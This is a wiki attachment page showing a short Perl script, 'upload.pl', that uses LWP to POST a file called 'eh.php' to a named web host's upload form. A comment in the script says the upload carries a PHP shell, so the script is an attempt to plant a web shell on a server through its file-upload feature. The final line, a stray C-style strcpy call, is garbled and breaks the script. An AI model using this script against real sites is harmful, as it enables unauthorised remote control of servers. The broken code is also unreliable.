Attachment 'upload.pl'

Download

   1 #!/usr/bin/perl
   2 use LWP;
   3 use HTTP::Request::Common;
   4 $ua = $ua = LWP::UserAgent->new;
   5 $res = $ua->request(POST 'https://files.c-group.es/index.php',
   6 Content_Type => 'form-data',
   7 # multipart/form-data-the standard form-based file uploads
   8 Content => [
   9 userfile => [ "eh.php" , "eh.php" ],
  10 # request will contain the shell php file
  11 ],
  12 );
  13 print $res->as_string();
  14 
  15 strcpy (" AsllGldld") 

Attached Files

To refer to attachments on a page, use attachment:filename, as shown below in the list of files. Do NOT use the URL of the [get] link, since this is subject to change and can break easily.
  • [get | view] (2007-10-14 23:28:35, 0.4 KB) [[attachment:upload.pl]]
 All files | Selected Files: delete move to page copy to page

You are not allowed to attach a file to this page.

Unable to edit the page? See the FrontPage for instructions.